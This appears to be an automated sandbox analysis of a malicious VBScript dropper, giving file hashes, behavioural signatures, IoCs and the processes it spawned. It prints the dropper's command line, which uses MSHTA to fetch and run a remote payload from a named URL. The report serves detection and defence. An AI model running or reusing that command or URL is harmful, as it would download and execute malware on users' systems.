Analysis
max time kernel: 28s
max time network: 45s
platform: windows7_x64
resource: win7-20220718-en
resource tags: arch:x64, arch:x86, image:win7-20220718-en, locale:en-us, os:windows7-x64, system
submitted: 09-08-2022 19:00
Static task: static1
Behavioral task: behavioral1
  Sample: LIYDOERWQPOKERHAVAXOCI.vbs
  Resource: win7-20220718-en (windows7-x64)
  3 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: LIYDOERWQPOKERHAVAXOCI.vbs
  Resource: win10v2004-20220722-en (windows10-2004-x64)
  11 signatures, 150 seconds
General
Target: LIYDOERWQPOKERHAVAXOCI.vbs
Size: 1KB
MD5: 733afa01e2447e2fcafcf4f224a1a4a7
SHA1: fcb94d8e29aa8bb802104a6ea49f7e715bea7031
SHA256: 00eb25d6c95f74f9c7caded04eca76fa2a03e280448af51c1108b75b2709909a
SHA512: 42658d2f4cbb0a75c49434644078ad5291995b415481186a66aad1fd31a3013002e6f753093f81c4d8022a7811b199e2b66270c4017a928f6bf9df72d0334948
Score: 10/10
Malware Config
Extracted
Language: hta
Source: hta.dropper
URLs: https://tradeguru.com.pk/enc1
Signatures
Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: MSHTA.EXE
  description | pid | pid_target | process | target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1380 | 1392 | MSHTA.EXE |
Blocklisted process makes network request (4 IoCs)
Processes: MSHTA.EXE
  flow | pid | process
  4 | 1380 | MSHTA.EXE
  5 | 1380 | MSHTA.EXE
  6 | 1380 | MSHTA.EXE
  7 | 1380 | MSHTA.EXE
Modifies Internet Explorer settings
Processes: MSHTA.EXE
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3762437355-3468409815-1164039494-1000\Software\Microsoft\Internet Explorer\Main | MSHTA.EXE
Processes
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"
  PID: 1272
C:\Windows\system32\MSHTA.EXE
  Command line: MSHTA.EXE https://tradeguru.com.pk/enc1
  Signatures: Process spawned unexpected child process; Blocklisted process makes network request; Modifies Internet Explorer settings
  PID: 1380
Network
MITRE ATT&CK Enterprise v6
Downloads
memory/1380-54-0x000007FEFBF31000-0x000007FEFBF33000-memory.dmp
  Filesize: 8KB